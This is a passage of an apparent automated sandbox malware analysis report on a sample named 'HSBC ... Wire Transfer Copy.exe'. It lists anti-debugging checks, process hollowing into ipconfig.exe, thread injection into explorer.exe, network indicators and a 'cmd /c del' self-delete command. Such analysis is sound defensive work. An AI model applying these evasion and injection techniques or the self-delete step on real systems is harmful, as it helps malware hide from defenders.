Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]		6_2_0164AE73
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]		6_2_0164AE73
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]		6_2_0164AE73
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]		6_2_0164AE73
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164AE73 mov eax, dword ptr fs:[00000030h]		6_2_0164AE73
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]		6_2_01637E41
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]		6_2_01637E41
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]		6_2_01637E41
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]		6_2_01637E41
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]		6_2_01637E41
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01637E41 mov eax, dword ptr fs:[00000030h]		6_2_01637E41
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]		6_2_016EAE44
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EAE44 mov eax, dword ptr fs:[00000030h]		6_2_016EAE44
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162E620 mov eax, dword ptr fs:[00000030h]		6_2_0162E620
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016DFE3F mov eax, dword ptr fs:[00000030h]		6_2_016DFE3F
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]		6_2_0162C600
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]		6_2_0162C600
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162C600 mov eax, dword ptr fs:[00000030h]		6_2_0162C600
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01658E00 mov eax, dword ptr fs:[00000030h]		6_2_01658E00
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E1608 mov eax, dword ptr fs:[00000030h]		6_2_016E1608
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]		6_2_0165A61C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165A61C mov eax, dword ptr fs:[00000030h]		6_2_0165A61C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016376E2 mov eax, dword ptr fs:[00000030h]		6_2_016376E2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016516E0 mov ecx, dword ptr fs:[00000030h]		6_2_016516E0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01668EC7 mov eax, dword ptr fs:[00000030h]		6_2_01668EC7
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016536CC mov eax, dword ptr fs:[00000030h]		6_2_016536CC
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016DFEC0 mov eax, dword ptr fs:[00000030h]		6_2_016DFEC0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F8ED6 mov eax, dword ptr fs:[00000030h]		6_2_016F8ED6
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]		6_2_016F0EA5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]		6_2_016F0EA5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F0EA5 mov eax, dword ptr fs:[00000030h]		6_2_016F0EA5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A46A7 mov eax, dword ptr fs:[00000030h]		6_2_016A46A7
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BFE87 mov eax, dword ptr fs:[00000030h]		6_2_016BFE87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364DB60 mov ecx, dword ptr fs:[00000030h]		16_2_0364DB60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]		16_2_03673B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03673B7A mov eax, dword ptr fs:[00000030h]		16_2_03673B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364DB40 mov eax, dword ptr fs:[00000030h]		16_2_0364DB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03718B58 mov eax, dword ptr fs:[00000030h]		16_2_03718B58
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364F358 mov eax, dword ptr fs:[00000030h]		16_2_0364F358
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370131B mov eax, dword ptr fs:[00000030h]		16_2_0370131B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]		16_2_036703E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]		16_2_036703E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]		16_2_036703E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]		16_2_036703E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]		16_2_036703E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036703E2 mov eax, dword ptr fs:[00000030h]		16_2_036703E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366DBE9 mov eax, dword ptr fs:[00000030h]		16_2_0366DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036C53CA mov eax, dword ptr fs:[00000030h]		16_2_036C53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036C53CA mov eax, dword ptr fs:[00000030h]		16_2_036C53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]		16_2_03674BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]		16_2_03674BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03674BAD mov eax, dword ptr fs:[00000030h]		16_2_03674BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03715BA5 mov eax, dword ptr fs:[00000030h]		16_2_03715BA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03651B8F mov eax, dword ptr fs:[00000030h]		16_2_03651B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03651B8F mov eax, dword ptr fs:[00000030h]		16_2_03651B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036FD380 mov ecx, dword ptr fs:[00000030h]		16_2_036FD380
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03672397 mov eax, dword ptr fs:[00000030h]		16_2_03672397
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367B390 mov eax, dword ptr fs:[00000030h]		16_2_0367B390
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370138A mov eax, dword ptr fs:[00000030h]		16_2_0370138A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036FB260 mov eax, dword ptr fs:[00000030h]		16_2_036FB260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036FB260 mov eax, dword ptr fs:[00000030h]		16_2_036FB260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0368927A mov eax, dword ptr fs:[00000030h]		16_2_0368927A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03718A62 mov eax, dword ptr fs:[00000030h]		16_2_03718A62
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]		16_2_03649240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]		16_2_03649240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]		16_2_03649240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03649240 mov eax, dword ptr fs:[00000030h]		16_2_03649240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370EA55 mov eax, dword ptr fs:[00000030h]		16_2_0370EA55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036D4257 mov eax, dword ptr fs:[00000030h]		16_2_036D4257
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03684A2C mov eax, dword ptr fs:[00000030h]		16_2_03684A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03684A2C mov eax, dword ptr fs:[00000030h]		16_2_03684A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A229 mov eax, dword ptr fs:[00000030h]		16_2_0366A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370AA16 mov eax, dword ptr fs:[00000030h]		16_2_0370AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0370AA16 mov eax, dword ptr fs:[00000030h]		16_2_0370AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03658A0A mov eax, dword ptr fs:[00000030h]		16_2_03658A0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364AA16 mov eax, dword ptr fs:[00000030h]		16_2_0364AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364AA16 mov eax, dword ptr fs:[00000030h]		16_2_0364AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]		16_2_03645210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03645210 mov ecx, dword ptr fs:[00000030h]		16_2_03645210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]		16_2_03645210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03645210 mov eax, dword ptr fs:[00000030h]		16_2_03645210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03663A1C mov eax, dword ptr fs:[00000030h]		16_2_03663A1C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03672AE4 mov eax, dword ptr fs:[00000030h]		16_2_03672AE4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03672ACB mov eax, dword ptr fs:[00000030h]		16_2_03672ACB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]		16_2_036452A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]		16_2_036452A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]		16_2_036452A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]		16_2_036452A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036452A5 mov eax, dword ptr fs:[00000030h]		16_2_036452A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365AAB0 mov eax, dword ptr fs:[00000030h]		16_2_0365AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365AAB0 mov eax, dword ptr fs:[00000030h]		16_2_0365AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367FAB0 mov eax, dword ptr fs:[00000030h]		16_2_0367FAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367D294 mov eax, dword ptr fs:[00000030h]		16_2_0367D294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367D294 mov eax, dword ptr fs:[00000030h]		16_2_0367D294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364C962 mov eax, dword ptr fs:[00000030h]		16_2_0364C962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364B171 mov eax, dword ptr fs:[00000030h]		16_2_0364B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364B171 mov eax, dword ptr fs:[00000030h]		16_2_0364B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366B944 mov eax, dword ptr fs:[00000030h]		16_2_0366B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366B944 mov eax, dword ptr fs:[00000030h]		16_2_0366B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]		16_2_03664120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]		16_2_03664120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]		16_2_03664120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03664120 mov eax, dword ptr fs:[00000030h]		16_2_03664120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03664120 mov ecx, dword ptr fs:[00000030h]		16_2_03664120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367513A mov eax, dword ptr fs:[00000030h]		16_2_0367513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367513A mov eax, dword ptr fs:[00000030h]		16_2_0367513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]		16_2_03649100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]		16_2_03649100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03649100 mov eax, dword ptr fs:[00000030h]		16_2_03649100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036D41E8 mov eax, dword ptr fs:[00000030h]		16_2_036D41E8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]		16_2_0364B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]		16_2_0364B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0364B1E1 mov eax, dword ptr fs:[00000030h]		16_2_0364B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]		16_2_036761A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036761A0 mov eax, dword ptr fs:[00000030h]		16_2_036761A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036C69A6 mov eax, dword ptr fs:[00000030h]		16_2_036C69A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]		16_2_036C51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]		16_2_036C51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]		16_2_036C51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036C51BE mov eax, dword ptr fs:[00000030h]		16_2_036C51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]		16_2_037049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]		16_2_037049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]		16_2_037049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_037049A4 mov eax, dword ptr fs:[00000030h]		16_2_037049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov ecx, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_036699BF mov eax, dword ptr fs:[00000030h]		16_2_036699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367A185 mov eax, dword ptr fs:[00000030h]		16_2_0367A185
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366C182 mov eax, dword ptr fs:[00000030h]		16_2_0366C182
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03672990 mov eax, dword ptr fs:[00000030h]		16_2_03672990
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03702073 mov eax, dword ptr fs:[00000030h]		16_2_03702073
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03711074 mov eax, dword ptr fs:[00000030h]		16_2_03711074
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]		16_2_03660050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03660050 mov eax, dword ptr fs:[00000030h]		16_2_03660050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]		16_2_0367002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]		16_2_0367002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]		16_2_0367002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]		16_2_0367002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0367002D mov eax, dword ptr fs:[00000030h]		16_2_0367002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]		16_2_0365B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]		16_2_0365B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]		16_2_0365B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0365B02A mov eax, dword ptr fs:[00000030h]		16_2_0365B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0366A830 mov eax, dword ptr fs:[00000030h]		16_2_0366A830

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Code function: 6_2_0040ACF0 LdrLoadDll,

6_2_0040ACF0

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.217.168.83 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.gramaltinrafineri.com
Source: C:\Windows\explorer.exe	Domain query: www.catproductreviews.com
Source: C:\Windows\explorer.exe	Domain query: www.piramsgprodiet.store
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: C50000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3352			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000000.291644026.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.327163839.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.308348112.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.316504406.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.292730514.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.327470385.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.308786581.00000000011E0000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.551824267.0000000004AB0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000C.00000000.319632104.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.301501003.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
